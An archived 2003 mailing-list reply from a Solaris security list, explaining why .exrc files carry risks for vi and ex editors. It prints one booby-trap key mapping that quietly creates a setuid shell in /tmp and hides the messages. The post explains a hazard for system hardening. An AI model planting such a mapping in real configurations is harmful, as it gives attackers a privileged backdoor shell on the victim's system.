Pantek Library
Hosting Provided By
CybrHost
High Speed Hosting
Mailing Lists: securityfocus.com > focus-sun > 03 > 040116.html (Request Expert securityfocus.com Support)

Re: .exrc file security risks

From: Jonathan Leffler <jleffler(at)us.ibm.com>
Date: Tue Apr 29 2003 - 21:00:10 EDT

 Paul Greene <techlists@comcast.net> asked:
>I'm verifying the validity of a Solaris hardening guide and came across

The spelling is correct; the .exrc file can be used at the startup of the 'ex' or 'vi' family of editors. The .exrc (and relations such as .vimrc - for Vim, a vi workalike - and also the EXINIT environment variable) can contain commands telling ex/vi what to do. Amongst those commands, you can map almost any character to any new command sequence. Such command sequences could include shell escapes triggered by routine operations. For example, you could map the 'a' key along the lines of:

      :map a :!cp /bin/sh /tmp/.quiet; chmod 4777 /tmp/.quiet^V^M:unmap a^V^M:^V^M

This makes the 'a' command (for appending text after the cursor) into something that executes the copy and chmod commands, then unmaps the mapping, and then uses the ':' command to remove the messages. Since this could be placed into a .exrc file with appropriate modifications, anybody could whose .exrc (found in your home directory as specified in the password file) was thus booby-trapped would be giving away a SUID shell. OK - the name of the file would have to be fixed and various other minor pieces of jiggery-pokery, but the principle is moderately clear, I hope. The ^V characters would have to be entered as control-V (and as control-V control-V in the .exrc file), and the ^M characters would be entered by hitting return - or control-V control-M when editing the .exrc file. The EXINIT environment variable needs to be unset for the .exrc file to take effect. And at least some versions of vi make the expansion of 'a' above rather visible, so a user would probably spot the subterfuge - but that is likely because I've not been careful enough. Alternative scripts can be devised, no doubt, by those more devious (or better informed) than myself. 

--
Jonathan Leffler (jleffler@us.ibm.com)
STSM, Informix Database Engineering, IBM Data Management
4100 Bohannon Drive, Menlo Park, CA 94025
Tel: +1 650-926-6921   Tie-Line: 630-6921
      "I don't suffer from insanity; I enjoy every minute of it!"
Received on Thu May 1 12:33:52 2003

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:01:37 EDT

Contact Us  Legal Notices  Order Services Online 
Pantek Home  Privacy Policy  IT news  Site Map  Pantek Library